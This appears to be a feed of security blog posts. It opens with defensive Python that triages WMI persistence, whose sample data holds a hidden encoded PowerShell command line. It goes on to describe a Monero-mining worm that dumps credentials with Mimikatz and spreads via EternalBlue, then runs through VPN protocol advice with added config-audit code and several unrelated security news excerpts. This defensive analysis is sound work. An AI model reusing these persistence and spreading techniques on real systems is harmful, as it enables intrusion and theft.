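        results.append({"filter": fname, "consumer": cname, "reasons": reasons,
                        "verdict": "suspicious" if reasons else "no findings"})
    return results


# Constructed records: the first triple mirrors the write-up's subscription,
# the second is a benign low-disk monitor for comparison.
SAMPLE_FILTERS = [
    {"Name": "SCM Event1 Log Filter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 10600 "
              "WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System"},
    {"Name": "LowDiskWatch",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 600 "
              "WHERE TargetInstance ISA Win32_LogicalDisk AND TargetInstance.FreeSpace < 1073741824"},
]
SAMPLE_CONSUMERS = [
    {"Name": "SCM Event1 Log Consumer",
     "CommandLineTemplate": "powershell.exe -NoP -NonI -W Hidden -EncodedCommand BASE64_PLACEHOLDER"},
    {"Name": "LowDiskNotify",
     "CommandLineTemplate": r"C:\Tools\notify-admin.exe --event low-disk"},
]
SAMPLE_BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event1 Log Filter"',
     "Consumer": 'CommandLineEventConsumer.Name="SCM Event1 Log Consumer"'},
    {"Filter": '__EventFilter.Name="LowDiskWatch"',
     "Consumer": 'CommandLineEventConsumer.Name="LowDiskNotify"'},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS):
        print(r["filter"], "->", r["consumer"], ":", r["verdict"], r["reasons"])
```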

Fig 11 Initial PS script hidden in WMI Class

It tries to delete the task scheduler entry “sysupdater0” and also checks for “sysupdater0.bat” in %systemroot%, removing it if it exists.

It modifies the Windows sleep, hibernate and power plan settings by invoking the following commands:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes all WMI objects in the __FilterToConsumerBinding class under the namespace “root\subscription” whose filter name does not match “SCM Event0 Log”.

Then it kills any process that has an “ESTABLISHED” connection on port 3333, 5555 or 7777.

It makes a list of the PIDs of running “PowerShell” processes and of the system’s network connections. It then checks for a process with an “ESTABLISHED” connection on port 80, 14444, 14433 or 443. If no such process exists and fewer than 8 PowerShell processes are running, it executes the Monero miner using the “funs” module. After that it executes Mimikatz and dumps credentials regardless of whether the Monero miner was executed.

It also enumerates the network addresses, checks which IPs are active and adds them to the property named ‘ipsu’. It then scans those IPs to identify systems vulnerable to MS17-010 (with the EternalBlue scanner script), stores them in the property ‘i17’ and finally executes shellcode which downloads ze3.ps1 or ze6.ps1, equivalent to in3.ps1 or in6.ps1, depending on the OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

The shellcode downloads and executes the PS script to infect other vulnerable systems. This way it spreads to, and mines on, the other systems on the network.

So in both cases, open source tools are abused heavily to perform the attack. Mimikatz, masscan and the EternalBlue vulnerability scanner seem to be popular tools among malware authors. Similar techniques are being used for spreading ransomware too. Seqrite successfully detects such attacks at various detection levels.

Indicator of Compromise:



Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

The strengths and weaknesses of different VPN protocols

One in four internet users use a VPN regularly, but how much does the average user know about what goes on behind the software?

Pulling back the curtain, a VPN runs on one of various VPN protocols that govern the way a VPN client communicates with a VPN server. Different protocols create different ways of connecting your device to the internet through encrypted tunnels.

The history of VPN protocols dates back to 1996, when a Microsoft employee came up with the Point-to-Point Tunneling Protocol (PPTP). The protocol, though not perfect, allowed people to work from home through a secure internet connection.

Since then, VPN protocol technology has evolved and, at the moment, there are five widely used VPN protocols. A breakdown of these five VPN protocols complete with their pros and cons is key to understanding VPN protocols in depth.


1. PPTP

As noted above, the Point-to-Point Tunneling Protocol was the first to be developed, and it is over 20 years old. The protocol relies on encryption, authentication and Point-to-Point Protocol (PPP) negotiation. In essence, that means it only needs a username, password, and server address to create a connection.

Most devices support PPTP, and because it is so easy to set up, it is rather popular among VPN companies. PPTP is incredibly fast, and as a result people who want to circumvent geo-restricted content prefer the protocol.

However, the speed comes at the cost of encryption. Of all the protocols, PPTP has the lowest level of encryption. Even Microsoft recommends that people stay away from PPTP because, from a security standpoint where encryption is key, PPTP is extremely unsafe.

That said, if your only concern is speed, then PPTP is the protocol for you.

Pros

  • Super-fast
  • Easy to set up and use
  • Nearly all platforms support the protocol

Cons

  • Lowest level of encryption of all five protocols
  • Microsoft itself recommends against using it

2. OpenVPN

First released in 2001, the OpenVPN protocol has become one of the most popular and widely used protocols. It is an open-source protocol which means coders can add to or edit the protocol, scrutinize the source code for vulnerabilities, and solve identified issues immediately.

OpenVPN uses SSL technology, and it is available on nearly all platforms, including Windows, Linux, iOS, Android, macOS, Blackberry, and routers. It operates on both Layer 2 and Layer 3, and it contains extra features that facilitate the transport of IPX packets and Ethernet frames. Moreover, it has NetBIOS functionality and, depending on the setup, it can share port 443 with HTTPS.

OpenVPN is incredibly secure thanks to the fact that it uses a 160-bit SHA1 hash algorithm, AES 256-bit key encryption (in addition to others), and 2048-bit RSA authentication.

That said, OpenVPN has a significant weakness: latency, that is, a considerable delay during operation. With more powerful hardware and the use of SSL certificates, one can get around this weakness.

Pros

  • Secure
  • Easily bypasses firewalls
  • Supports a variety of cryptographic algorithms
  • It is open-source which means it’s easy to vet
  • Supports Perfect Forward Secrecy

Cons

  • Needs a third-party software for set-up
  • It can be difficult to configure
  • Potentially higher latency periods
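
The OpenVPN section above lists the settings that make the protocol secure (AES-256 data encryption, a SHA1 HMAC, RSA authentication, TLS-based key exchange) and notes that it can share port 443 with HTTPS. Whether a given deployment actually gets those properties depends on the profile, so the following Python audits an OpenVPN client profile for the weak choices the text warns about. This is an added example, not code from the original article or from the OpenVPN project. The directive names (cipher, data-ciphers, auth, tls-version-min, remote-cert-tls, proto, remote) are OpenVPN's own; the two sample profiles, the hostname vpn.example.invalid and the strength thresholds are constructed assumptions for illustration.

```python
"""Audit an OpenVPN client profile for weak settings (added example, not project code).

Directive names are OpenVPN's own; sample profiles, the hostname
vpn.example.invalid and the strength thresholds are constructed assumptions.
"""
from typing import Dict, List

# Ciphers and HMAC algorithms treated as acceptable in this example (assumption).
STRONG_CIPHERS = {"AES-256-GCM", "AES-128-GCM", "AES-256-CBC", "CHACHA20-POLY1305"}
STRONG_AUTH = {"SHA256", "SHA384", "SHA512"}
LEGACY_AUTH = {"SHA1"}  # the article's 160-bit SHA1: flagged for upgrade, not as broken


def parse_openvpn_config(text: str) -> Dict[str, List[str]]:
    """Map each directive to its argument list.

    '#' and ';' start comments. Inline <ca>...</ca>-style blocks carry PEM
    material and are skipped; they do not affect the checks below.
    """
    directives: Dict[str, List[str]] = {}
    in_block = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("</"):      # end of an inline block
            in_block = False
            continue
        if line.startswith("<"):       # start of an inline block
            in_block = True
            continue
        if in_block:
            continue
        parts = line.split()
        directives[parts[0].lower()] = parts[1:]
    return directives


def audit_openvpn(text: str) -> List[str]:
    """Return findings prefixed 'WEAK:' (change it) or 'INFO:' (worth knowing)."""
    cfg = parse_openvpn_config(text)
    findings: List[str] = []

    # Newer profiles negotiate from a data-ciphers list; older ones set one cipher.
    if "data-ciphers" in cfg:
        ciphers = cfg["data-ciphers"][0].upper().split(":")
    else:
        ciphers = [cfg.get("cipher", ["BF-CBC"])[0].upper()]  # BF-CBC: historical default
    for c in ciphers:
        if c not in STRONG_CIPHERS:
            findings.append(f"WEAK: legacy data-channel cipher {c}; use AES-256-GCM")

    auth = cfg.get("auth", ["SHA1"])[0].upper()  # SHA1 is the directive's default
    if auth in LEGACY_AUTH:
        findings.append("WEAK: HMAC auth is SHA1 (the article's 160-bit hash); prefer SHA256")
    elif auth not in STRONG_AUTH:
        findings.append(f"WEAK: HMAC auth {auth} is not acceptable; use SHA256 or stronger")

    tls_min = cfg.get("tls-version-min", ["1.0"])[0]  # unset treated as 1.0 (assumption)
    if float(tls_min) < 1.2:
        findings.append(f"WEAK: tls-version-min {tls_min}; require 1.2 or higher")

    if "remote-cert-tls" not in cfg:
        findings.append("WEAK: remote-cert-tls server missing; client does not check server role")

    # The article's firewall-traversal point: TCP on 443 shares the HTTPS port.
    proto = cfg.get("proto", ["udp"])[0].lower()
    port = cfg.get("port", [None])[0]
    remote = cfg.get("remote", [])
    if port is None and len(remote) >= 2:
        port = remote[1]
    if proto.startswith("tcp") and port == "443":
        findings.append("INFO: tcp/443 shares the HTTPS port, the setup the article credits for bypassing firewalls")
    return findings


def weak_findings(text: str) -> List[str]:
    """Only the findings that call for a configuration change."""
    return [f for f in audit_openvpn(text) if f.startswith("WEAK:")]


# Constructed sample profiles, not real deployments.
WEAK_CLIENT_CONFIG = """\
# legacy profile, constructed for illustration
client
dev tun
proto udp
remote vpn.example.invalid 1194
cipher BF-CBC
auth MD5
tls-version-min 1.0
<ca>
PLACEHOLDER-NOT-A-REAL-CERTIFICATE
</ca>
"""

HARDENED_CLIENT_CONFIG = """\
# hardened profile, constructed for illustration
client
dev tun
proto tcp
remote vpn.example.invalid 443
remote-cert-tls server
data-ciphers AES-256-GCM:CHACHA20-POLY1305
auth SHA256
tls-version-min 1.2
"""

if __name__ == "__main__":
    for name, profile in (("weak", WEAK_CLIENT_CONFIG), ("hardened", HARDENED_CLIENT_CONFIG)):
        print(f"--- {name} ---")
        for finding in audit_openvpn(profile) or ["no findings"]:
            print(finding)
```

Run against the legacy profile it reports four items to fix (Blowfish cipher, MD5 HMAC, TLS 1.0 still allowed, no server-role check); the hardened profile yields no WEAK findings and one INFO line noting that tcp/443 is what gives OpenVPN its firewall-bypassing reputation. Key sizes (the 2048-bit RSA the article mentions) live in the certificates, not in these directives, so they are deliberately out of scope here.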

3. L2TP/IPsec

To fully understand Layer 2 Tunneling Protocol (L2TP), it is essential first to mention Layer 2 Forwarding (L2F). Cisco developed L2F soon after the release of PPTP to try and improve on the flaws of PPTP. Unfortunately, L2F wasn’t perfect either.

Therefore, in 1999, the vendors concerned released L2TP as an improvement on both PPTP and L2F. L2TP combines the best of L2F and PPTP to provide a more secure and reliable tunneling protocol.

However, note that L2TP is simply a tunneling protocol and provides neither encryption nor privacy. Due to the lack of encryption, L2TP cannot function as a secure protocol alone and must be paired with IPsec, a security protocol that supplies the required encryption. Bundling the L2TP and IPsec protocols leads to something known as double encapsulation.

In double encapsulation, the first layer creates a PPP connection to a remote host and the second layer wraps that connection in IPsec.

L2TP supports AES 256 encryption algorithms—some of the most secure—and it prevents man-in-the-middle attacks because data cannot be altered when in transit between the sender and receiver.

Bear in mind that the double encapsulation reduces speed. Moreover, L2TP can only communicate via the User Datagram Protocol (UDP), and that restriction makes it easy to block.

Pros

  • Secure according to most
  • Works in almost all platforms
  • Easy to set up
  • Supports multithreading which increases performance

Cons

  • Both Edward Snowden and John Gilmore have noted that the NSA might have deliberately weakened IPsec, which means it could be compromised.
  • Firewalls can easily block it because it only communicates over UDP.
  • Slower than OpenVPN due to double encapsulation

4. SSTP

Secure Socket Tunneling Protocol (SSTP) is very similar to OpenVPN with the only difference being that it is proprietary software that Microsoft developed and introduced in Windows Vista.

Just like OpenVPN, SSTP supports AES 256-bit key encryption, and it uses 2048-bit SSL/TLS certificates for authentication. The protocol has native support for Linux, Windows, and BSD systems. The rest, e.g., Android and iOS, only have support via third-party clients.

Pros

  • Provides support for a wide range of cryptographic algorithms
  • Supports Perfect Forward Secrecy
  • Easy to use especially because the protocol is already integrated into Windows

Cons

  • Does not do as well on other systems as it does on Windows
  • It is impossible to audit underlying code because the protocol is proprietary

5. IKEv2

Internet Key Exchange version 2 (IKEv2) is a tunneling protocol that provides a secure key exchange session. The protocol was a collaboration between Microsoft and Cisco. Similar to L2TP, it is often paired with IPsec to provide authentication and encryption.

IKEv2 is uniquely suited to mobile VPN solutions. First, it is very good at reconnecting after a temporary loss of internet connection. Second, it is adept at reconnecting during a network switch (e.g. from mobile data to Wi-Fi).

IKEv2 is not as popular as OpenVPN, PPTP or L2TP/IPsec, but a good number of VPNs, especially those that specialize in mobile VPNs, use it. Because it is proprietary software, it only has native support for Windows, iOS, and Blackberry.

Pros

  • Extremely stable and does not drop the VPN connection when switching networks
  • Incredibly fast
  • Supports Perfect Forward Secrecy
  • Supports a variety of cryptographic algorithms
  • Easy to set-up

Cons

  • Suffers from the same IPsec drawbacks (NSA tampering)
  • Does not support a considerable number of platforms
  • Firewalls can block the protocol

Summary

From the discussion above, the one clear thing is that no single VPN protocol can satisfy all user requirements. Some VPN protocols prioritize speed while others prioritize security.

Consequently, it is not a surprise to find a VPN provider that has found a way to incorporate all five in a bid to provide the best possible service.

About the author: Susan Alexandra

Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and cryptocurrency investor. Susan’s inbox is open for new ideas and stories; you can share story ideas at susanalexandra67@gmail.com

Pierluigi Paganini

(SecurityAffairs – VPN, privacy)


The post The strengths and weaknesses of different VPN protocols appeared first on Security Affairs.

Best practices when implementing SD-WAN

Telecoms is an overall complex business – delivering network circuits and optimizing connections – but SD-WAN has its own very specific set of obstacles. SD-WAN involves many components that contribute to overall internet network performance such as national policy, security, hardware delivery, installation and cloud applications. Each element can significantly affect a successful SD-WAN transformation. Below, we explore the most common questions that spring up when implementing SD-WAN, and how to make the process as … More

The post Best practices when implementing SD-WAN appeared first on Help Net Security.

Too fast, too insecure: Securing Mongo Express web administrative interfaces

Mongo Express is a lightweight web-based administrative interface deployed to manage MongoDB databases interactively. It is authored using Node.js, Express and Bootstrap packages. This case study highlights the deployment of Mongo Express admin panels without authentication on the Internet and the various measures to prevent the exposure.

The authentication scheme

Mongo Express comes with a config-default.js file. It primarily supports basic authentication, which encompasses the base64 encoded payload of a username:password combination. This means that, … More

The post Too fast, too insecure: Securing Mongo Express web administrative interfaces appeared first on Help Net Security.

Cybercriminals are becoming more methodical and adaptive

Cybercriminals are deviating towards a more focused approach against targets by using better obfuscation techniques and improved social engineering skills as organizations improve in areas such as time to detection and response to threats, according to Trustwave. The 2019 Trustwave Global Security Report is based on the analysis of billions of logged security and compromise events worldwide, hundreds of hands-on data breach and forensic investigations, manual penetration tests, network vulnerability scans and internal research. Asia … More

The post Cybercriminals are becoming more methodical and adaptive appeared first on Help Net Security.

Something’s Phishy With the Instagram “HotList”

Phishing scams have become incredibly popular these days. Cybercriminals have upped the ante with their tactics, making their phishing messages almost identical to the companies they attempt to spoof. We’ve all heard about phishing emails, SMiShing, and voice phishing, but cybercriminals are turning to social media for their schemes as well. Last week, the “Nasty List” phishing scam plagued Instagram users everywhere, leading victims to fake login pages as a means to steal their credentials. Now, cybercriminals are capitalizing on the success of the “Nasty List” campaign with a new Instagram phishing scam called “The HotList.”

This scam markets itself as a collection of pictures ranked according to attractiveness. Similar to the “Nasty List,” this scheme sends messages to victims through hacked accounts saying that the user has been spotted on this so-called “hot list.” The messages claim to have seen the recipient’s images on the profile @The_HotList_95. If the user goes to the profile and clicks the link in the bio, they are presented with what appears to be a legitimate Instagram login page. Users are tricked into entering their login credentials on the fake login pages, whose URL typically ends in .me domains. Once the cybercriminals acquire the victim’s login, they are able to use their account to further spread the campaign.

Images courtesy of Bleeping Computer. 

Luckily, there are steps users can take to help ensure that their Instagram account stays secure:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. And if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common indicators of a potential scam at play.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in .me.
  • Reset your password. If your account was hacked by “The HotList” but you still have access to your account, reset your password to regain control of your page.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Something’s Phishy With the Instagram “HotList” appeared first on McAfee Blogs.

Oversharing and safety in the age of social media

Many years ago, I worked with healthcare organizations to install infrastructure to support the modernization of their information systems. As I traversed hospitals – both in public and private sectors – I was often struck by one particular best practice: the privacy reminders were ubiquitous. If I stepped into an elevator or walked down a hallway, there was signage to remind everyone about patient privacy. Nothing was left to chance or interpretation. This was also pre-social media, so the concerns ranged from public conversations or inappropriate use of email, to leaving a document on a public printer.

Fast forward to 2019. Our society and culture have changed. We are much freer with our personal information on social media. We talk openly about our lives and post pictures and family information in the wild. We are less concerned about our privacy, as we use these platforms to connect with others – a connection we might be denied given our busy lives. However, as has oft been written, these platforms can be a cache of riches for someone seeking to steal your identity or compromise your email and other accounts. This same type of free flow of information is also following us to other parts of our lives and making it easier for the bad guys to attack and profit. Let me explain with a few examples.

I travel a bit (okay, a lot). While my global travel is mostly for work, this provides an informative world lens for people watching and listening. I am often between flights in an airport reading or catching up on email and overhear a wide variety of conversations – without even trying. Recently, I was in the U.S., delayed at the Chicago O’Hare airport for several hours as “there is (was) weather in Chicago,” the worst phrase in the US travel industry. I overheard a man on the phone discussing his declined credit card in detail, including his full name, billing ZIP code, card number, expiration date, and so on. My shock quickly faded when I started thinking about how many other times I was in public and overheard things that could lead to financial or IP or other loss for an individual or company. The number is non-trivial. That’s when I decided to tweet some simple advice, and solicit input via my twitter feed.

The results were equally horrifying and amusing. Some even thought my post was an attempt in social engineering. Overall, the response convinced me to write a blog as the evidence I gathered suggests this isn’t a small problem. Rather, it’s a real problem. So let me start by sharing some examples and then make some suggestions (which may seem obvious to many of you) on how to protect your privacy and security.

 

So how do you protect yourself from theft of personal or proprietary company information in public? The super obvious, somewhat flippant answer is: don’t share any of this type of information in public. But, at times, this is easier said than done. If you travel as much as I do, it becomes impossible to refrain from conducting some confidential business whilst you are on the road. So how do you actually protect yourself?

Many people will read this blog and say, “well that’s obvious,” but sadly it is not, based on what I have personally observed and the feedback I received in preparation for this post. When in these types of situations, my recommendations are:

  • Use privacy screens on your laptop and your phone when in public, in meetings, and on airplanes. I cannot tell you how much confidential information I could have obtained just sitting behind someone on a plane.
  • Do not discuss confidential information in a public place: restaurant, club, elevator, airplane, etc. Based on the Twitter solicited feedback, people somehow think planes are cones of silence.
  • If you must conduct personal/confidential business on the road, wait until you arrive at your hotel or find a quiet place in the airport/club/restaurant where your back is to a wall and you can see anyone who is located by you. Use your best judgment.
  • Never give anyone your password. I don’t know how to say this more strongly. Do not ever give anyone your password.
  • Use a password manager. Don’t reuse passwords. This way if someone does obtain one of your passwords, you limit your exposure.
  • Be cognizant of what you put on social media. I am very active on social media but, remember, your information can and will be used against you. Be careful of when and how you post to avoid advertising when your home will be vacant for vacation or any personally identifiable information that could expose your passwords.
  • If someone calls you claiming to be from your bank, the IRS, the police, your company, a tech support organization, offer to call them back from a number that is published on their legitimate website or the back of your credit card, etc. Do not give any confidential information to an inbound caller.
  • Use encryption for sensitive data and sensitive communications.
  • If you must install IoT devices at home, segment them to a unique network.
  • If you are renting a private vacation home, there are some very good apps to scan the network to make certain you have privacy (e.g., cameras in a location that was not disclosed by the owner).
  • I am not a fan – at all – of listening devices at home, but if you do have one, remember there is a possibility we will find out all of your conversations were recorded. Be aware of what you say…

The world is quickly evolving as we embrace more technology. The onus is largely on users to protect themselves. While this blog is just a high-level discussion of social engineering and privacy, using common sense is always your best defense.

 

The post Oversharing and safety in the age of social media appeared first on Microsoft Security.

Trust is Not a Light Switch

We frequently get asked about our competitors and, more specifically, about the security implications of those competitors. Our response always consists of two facts. First, you don’t decide overnight to be trustworthy, transparent and accountable. Second, security, trust, data protection and privacy have been strategic Cisco priorities for many years. We weave them into everything that we do. We’ve been put under the microscope by our customers, media, and the industry. We encourage and embrace that scrutiny. There should be no such thing as implicit trust in today’s world. In fact, we believe the standards should be set higher, not only for Cisco but for all technology providers around the globe, to shift the role from a vendor to a trusted partner.

We have listened to our customers’ cybersecurity priorities and concerns as a guide to help shape our company, all with a goal of being a trusted partner at every step. It is not enough for a vendor to say their products are technically secure or to say their company behaves in a trustworthy way. Vendors must explicitly demonstrate a range of behaviors that prove they are a trusted partner and integrate those behaviors consistently throughout their operations.

Being a trusted partner is not a guarantee that things will never go wrong – no one is perfect. However, it does mean taking precautions to help avoid things from going wrong and acting with integrity when something does go wrong. To further the point, we’d like to share a few things we’ve learned along the way and the actions we have taken to strive for and maintain trusted partner status.

A Secure Development Lifecycle (SDL) is a must do. An SDL is a documented, repeatable, and measurable process to ensure security is built into solutions by design and that security policy is implemented consistently. It ingrains end-to-end integrity across solutions and ensures that security requirements evolve based on the threat landscape. Our SDL has roots back to 2002 and was formally established in 2009. We’ve been through this process for 4,600 releases across more than 400 Cisco product families. We also report our product security metrics to the Cisco Board of Directors. We take it very seriously, with an entire organization dedicated to the proper execution and enforcement of our SDL.

The core of any SDL must consist of secure and consistent coding. From our new developers to our veterans, all levels are tasked with following secure coding standards and best practices that help ensure threat-resistant code and rigorous control of our development environment. In doing this, we know exactly where certain pieces of code are, when and where to patch bugs, and who is ultimately accountable for the security of the code that has been developed. We use Cisco vetted and maintained security modules to reduce security issues, such as excluding known vulnerabilities, while enhancing the engineers’ ability to confidently deploy security features. For example, six years ago we realized how important it was to control encryption related code in our products. Today, CiscoSSL is embedded in over 425 product families we ship today.

Even with a strong SDL, Cisco acquires new technology, consumes software that we don’t develop, and continues to push our own innovation forward. Ultimately, this means bugs and vulnerabilities can still happen. Becoming a trusted partner not only means having a mechanism in place to pinpoint when and where bugs or vulnerabilities pop up – it also means that when you fix them, you fix them in all impacted solutions. This applies to our own and third-party code, and it means transparently disclosing them to all our customers simultaneously when they do. To meet this need, Cisco was one of the first technology companies to address Third-Party Software (TPS) and implement a TPS tracking system for all products we build. For the past ten years, we have continuously improved a system that requires our engineering teams to govern the risks of all TPS used in hardware and software that Cisco distributes. Today, we’re proud to say, a solution cannot ship or go live unless all TPS has been disclosed and all identified security and legal requirements are addressed. In terms of disclosure, we report vulnerabilities found externally and we also report those we find ourselves, internally. Transparency is a critical element in operating as a trusted partner; this is one of the ways we demonstrate the act of transparency to our customers.

Certification and attestation are necessary milestones on the journey to explicit trust. One of the ways we showcase the trustworthiness of our solutions is by achieving global certifications. We work with global governments and regulatory bodies to ensure our solutions meet the latest requirements as well as provide input on how to improve those requirements and help secure the many markets we do business in. In fact, earlier this month one of our cloud services received an attestation report meeting the BSI Cloud Computing Compliance Controls Catalogue (BSI C5). Due to our consistent development process, and aligning our security engineering standards to global standards, we’ve been able to build our solutions to pass multiple verification checkpoints along the way. These verification checkpoints are often necessary, but not sufficient to win the trust of our customers. We often work with customers to validate explicitly, with targeted assessments that go above and beyond these standard checkpoints. This is a critical ‘trust but verify’ step.

The path to earning and maintaining the position of trusted partner is a privilege, and one which never fully ends. Most of these practices take years to fully incorporate into a vendor’s operations. It takes time, investment, the right talent and an overall cultural commitment. Trust is not a light switch you flip on to respond to competition or a media cycle. It takes years to build an organization that systemically thinks about – and implements – Security and Trust with a commitment to continual improvement and company-wide innovation.

We encourage you to be vigilant as you evaluate your vendors. Do not make another ICT purchasing decision without demanding that your vendors prove themselves with explicit trust. Get them to show, not just tell, how they’re incorporating trusted partner elements into every facet of their business.

For more on Cisco Security & Trust news and activities, be sure to visit our Trust Center.

You can’t fix what you can’t see: A new way of looking at network performance

Network performance, or the service quality of a business’ network, is critical to running a successful enterprise. Imagine the cost to an organization when the corporate network or the e-commerce site is down or experiencing unacceptable latency. Customers get frustrated, prospects immediately turn away from purchases, and internally, IT and network admins are in a panic to get systems up and running again, fueled by C-suite pressure.

Defining today’s network performance

To optimize network performance, … More

The post You can’t fix what you can’t see: A new way of looking at network performance appeared first on Help Net Security.

Employers should develop cybersecurity protocols and invest more in employee training programs

Organizations want to trust their employees when it comes to cybersecurity, but to do so, they need to better leverage technology. The ObserveIT global survey of 600 IT leaders across various industries found that employers should develop clear cybersecurity protocols and invest more in employee training programs and monitoring tools to verify safe user activity. Since 2016, the average number of incidents involving employee or contractor negligence has increased by 26 percent, and by 53 … More

The post Employers should develop cybersecurity protocols and invest more in employee training programs appeared first on Help Net Security.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

Nearly half of firms suffer data breaches at hands of vendors

As trusted partners, third-party vendors often become the overlooked or unwitting accomplice in criminal activities. As privacy laws and cybersecurity regulations continue to increase accountability around data confidentiality and protection, eSentire wanted to know how seriously firms take the risks associated with third-party vendors, and their vendors’ vendors. Earlier this year, eSentire commissioned Spiceworks to survey 600 IT and security decision-makers about their top concerns around their supply chain and the policies or procedures used … More

The post Nearly half of firms suffer data breaches at hands of vendors appeared first on Help Net Security.

What you can expect at HITBSecConf2019 Amsterdam

Taking place across 5 days from the 6th till the 10th of May 2019, HITBSecConf2019 Amsterdam is one of the most prestigious cybersecurity events in Europe. With the event celebrating a decade of excellence, we took this opportunity to sit down with Dhillon Andrew Kannabhiran, the Founder and CEO of Hack in The Box, to talk about this year’s conference. This is the 10th year of HITB Security Conference in Amsterdam! What makes this edition … More

The post What you can expect at HITBSecConf2019 Amsterdam appeared first on Help Net Security.

Research on private key generation reveals theft of ETH funds from accounts with discoverable keys

Researchers at Independent Security Evaluators (ISE) have discovered 732 actively used private keys on the Ethereum blockchain. In their new study titled Ethercombing, ISE found that poorly implemented private key generation is also facilitating the theft of cryptocurrency.

[Figure: Example flow of deriving an Ethereum address from a private key]

The researchers identified 13,319 Ether (ETH) which was transferred to both invalid destination addresses and forever lost, as well as to wallets derived from weak private … More

The post Research on private key generation reveals theft of ETH funds from accounts with discoverable keys appeared first on Help Net Security.

Emerging Cybersecurity Threats Affecting Online Retailers

Online retailers are among the favorite targets of hackers, the simple reason being that retailers process large volumes of customer data on a day-to-day basis. Another reason is that many retailers, especially smaller companies, don’t take the necessary steps to protect themselves from cybercriminals, and hence it becomes easy for attackers to target them.

It is a widely known fact that hackers today target not just the big companies; they are after smaller ones as well. Big companies might have the resources to combat cyberattacks and to bounce back into business, even after massive breaches. Smaller businesses have to keep in mind that they might not have the resources, especially the money, needed to bounce back after a major cybersecurity breach. The damage caused by such an attack could put them out of business entirely. Thus, it is best to understand the cybersecurity risks that retailers, both big and small, could face and take steps to counter and mitigate them. Here’s a look at the emerging cybersecurity threats that affect online retailers today…

Supply chain attacks – No direct access to retailers’ systems needed!

Supply chain attacks take place when attackers breach third parties connected to a retailer, especially partners and companies that facilitate the retailer’s operations. Such breaches can ultimately lead to data breaches at the retailer itself: an attacker who compromises a retailer’s suppliers can, without ever accessing the retailer’s own systems, obtain data associated with the retailer’s business. The same applies to a shipping company or the online SaaS products integrated with the retailer’s business. Partners and clients of online retailers often have direct access to the retailers’ core systems, so by compromising those partners’ and clients’ networks, attackers can ultimately reach the retailers’ networks as well. Supply chain attacks against partners, clients, business associates and suppliers with vulnerable systems can therefore cause great damage to online retailers. It is thus of utmost importance that online retailers stay vigilant when choosing app integrations and avoid connecting with businesses that have poor cybersecurity practices in place.

Ransomware attacks – Widespread and devastating!

Ransomware attacks have become widespread in recent times, especially in the last couple of years, and online retailers are among the worst hit worldwide. A ransomware attack encrypts all the data in the targeted systems and networks, leaving the retailer unable to access any of the data stored there. Retailers store large amounts of customer data, and when that data becomes inaccessible and unusable, all business activities are thrown out of gear. The only way out, especially for businesses that have no backup of their data, would be to pay the ransom the cybercriminals demand for decrypting it. For many small businesses, paying the ransom is not easy. Moreover, there have been instances where, despite payment, the attackers did not decrypt the data. Hence, the best solution is to practice good internet hygiene, with special importance given to protecting the network against phishing attacks, and to ensure that there is always a properly updated backup of all important and sensitive data.

Return and refund frauds – Quite common!

Return and refund frauds have become quite common these days. There are instances when fake receipts are used to get refunds on products that were never purchased. There are also instances when hackers order goods using stolen credit cards or breached card/banking data and then request a refund to be processed through another card or account. In some other cases, people order and collect goods, and then file complaints claiming that their order was never shipped. Most reputable retailers today have a return and refund policy. Since the criminals come up with all kinds of innovative techniques to commit such frauds, the best thing that any online retailer can do is to keep updated on the return and refund fraud landscape and take sufficient steps to protect themselves against such frauds.

Exploiting IoT vulnerabilities – An emerging trend!

With more and more IoT (Internet of Things) devices being used at different stages of the retail business, exploiting IoT vulnerabilities is now an emerging trend. Retailers use IoT devices in the different stages of the supply chain: in tracking supplies, in monitoring warehouses, in sorting and restocking supplies etc. They also use IoT devices to automate tasks at the stores. But many retailers today ignore the security aspect of these IoT devices and, as a result, they get targeted by hackers. Hackers can, through an IoT attack on the supply chain, reroute all supplies for a retailer to some other location and thus cause great damage to the retailer. IoT vulnerabilities can also be exploited by a hacker to breach an online retailer’s business network and steal sensitive data from the network. Hence all businesses in the retail sector should invariably make it a point to secure all IoT devices that they use and keep all hardware/software updated with the latest security patches.

Account Takeover (ATO) frauds – Causing reputation damage!

